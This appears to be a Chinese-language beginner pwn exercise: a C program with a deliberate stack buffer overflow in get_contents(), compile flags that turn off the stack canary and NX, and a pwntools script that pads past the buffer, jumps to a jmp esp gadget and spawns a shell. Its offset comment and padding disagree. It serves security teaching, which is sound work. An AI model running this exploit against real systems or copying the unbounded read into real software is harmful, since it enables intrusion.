给学弟们练手的题目,做的过程中接触一些基本概念
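#include <stdio.h>
#include <unistd.h>

/* Both helpers are defined after main(), so declare them before use. */
void welcome(void);
void get_contents(void);

/*
 * Practice target for a stack buffer overflow exercise.
 *
 * Prints a greeting, reads a name, then calls get_contents(), which holds
 * the deliberately unbounded read the exercise is built around.
 */
int main()
{
    char name[40];

    welcome();
    printf("enter your name ");
    /* Bounded correctly: at most sizeof name bytes are read. */
    read(STDIN_FILENO, name, 40);
    /*
     * The listing had 'x00' here, a multi-character constant that stores
     * the character '0' rather than a terminator (most likely '\x00' with
     * the backslash lost). Write the NUL byte explicitly.
     */
    name[39] = '\0';
    get_contents();
    return 0;
}

/* Print the greeting banner. */
void welcome(void)
{
    printf("welcome to play the game! ");
}

/*
 * Read the "contents" line from stdin.
 *
 * Intentional flaw for the exercise: read() is allowed up to 200 bytes but
 * contents holds only 50, so longer input overwrites adjacent stack memory,
 * including the saved return address. A bounded version would pass
 * sizeof contents as the length. The page builds this file with the stack
 * protector disabled, so the overwrite is not detected on return.
 */
void get_contents(void)
{
    char contents[50];

    puts("enter the contents you want to save:");
    read(STDIN_FILENO, contents, 200);
}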
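编译参数(-fno-stack-protector 关闭栈保护 canary,-z execstack 让栈可执行(即关闭 NX),-m32 编译为 32 位程序;前两项是编译器默认开启的缓解措施,这里为了练习特意关掉)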
-fno-stack-protector -z execstack -m32
题目是最简单的情况,不多加分析,下面直接给出exp
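# Solution script (pwntools) for the practice binary on this page.
#
# The listing had been collapsed onto one line, which turned everything after
# the first '#' into a comment; the statements are restored one per line here
# and are otherwise unchanged.
#
# It answers the name prompt, then sends a "contents" line longer than the
# 50-byte buffer in get_contents(). This works only against the lab build
# described on the page: with the stack protector enabled the overwrite is
# detected before the function returns, and with a non-executable stack (NX)
# bytes placed on the stack cannot run.
from pwn import *

context(os='linux', arch='x86')
#context.log_level='debug'

# 0x80485e3 : jmp esp
# Hard-coded address taken from the author's own ./a.out; presumably it
# differs for any other build and assumes a fixed load address (no PIE) - verify.
# offset: 66
# NOTE(review): the comment above says 66, but the payload below pads with 62
# bytes. The two disagree; confirm which value matches the actual build.
jmp_esp = 0x80485e3

p = process('./a.out')
#gdb.attach(p)

# First prompt: any short name will do.
p.sendlineafter('name ', 'a')

# Second prompt: filler up to the saved return address, the packed 32-bit
# address, then the assembled shellcraft.sh() bytes.
# NOTE(review): 'a'*62 is a str while p32() returns packed bytes, so this
# concatenation is Python 2 style.
# NOTE(review): the C listing prints this prompt with puts(), and the prompt
# strings on this page look like they lost escape sequences in extraction, so
# 'save: ' may not match the program's output exactly - verify.
p.sendlineafter('save: ', 'a'*62 + p32(jmp_esp) + asm(shellcraft.sh()))

p.interactive()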